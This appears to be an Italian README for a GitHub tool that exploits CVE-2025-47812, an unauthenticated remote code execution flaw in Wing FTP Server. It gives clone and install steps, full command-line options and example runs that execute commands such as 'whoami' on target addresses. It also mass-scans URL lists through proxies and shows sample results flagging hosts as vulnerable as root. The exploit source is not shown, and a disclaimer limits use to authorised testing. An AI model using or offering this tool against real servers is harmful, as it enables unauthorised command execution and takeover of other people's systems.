
Exploit e scanner per CVE-2025-47812 che mira all'esecuzione remota di codice non autenticata in Wing FTP Server, con supporto per target singolo, scansione di massa, proxy e più formati di output.
Exploit migliorato per Wing FTP Server CVE-2025-47812 - Esecuzione remota di codice non autenticata (RCE)
Clona questo repository ed entra nella directory:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
Oppure scarica semplicemente lo script CVE-2025-47812.py ed eseguilo.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit per Wing FTP Server CVE-2025-47812 - versione migliorata
opzioni:
-h, --help mostra questo messaggio
-u URL, --url URL URL di destinazione (es. http://192.168.1.100:5466)
-f FILE, --file FILE file con elenco di URL (uno per riga)
-c COMMAND, --command COMMAND
comando da eseguire (predefinito: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
nome utente (predefinito: anonymous)
-P PASSWORD, --password PASSWORD
password (predefinito: vuota)
--check modalità verifica: controlla solo se è vulnerabile (usa comando innocuo)
-v, --verbose modalità verbose (mostra dettagli)
--proxy PROXY proxy (es. http://127.0.0.1:8080)
--timeout TIMEOUT timeout in secondi (predefinito: 10)
-o OUTPUT, --output OUTPUT
file di output per salvare i risultati
--output-format {txt,json,csv}
formato di output (predefinito: txt)
--threads THREADS numero di thread per scansionare più obiettivi (predefinito: 5)
--no-progress nascondere la barra di avanzamento
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o risultati.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
Il file deve contenere un URL per riga, ad esempio:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABILE - utente: root
http://192.168.1.11:5466 - SICURO - Non vulnerabile
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "utente: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,utente: root
Questo exploit è progettato esclusivamente per scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato di questo strumento contro sistemi senza consenso esplicito è illegale e può comportare gravi conseguenze legali. Gli autori non si assumono responsabilità per l'uso improprio che ne possa essere fatto.
Se ti piace questo lavoro, non dimenticare di dargli una stella ⭐ su GitHub!
Questo progetto è concesso in licenza sotto la MIT License – vedere il file LICENSE per maggiori dettagli.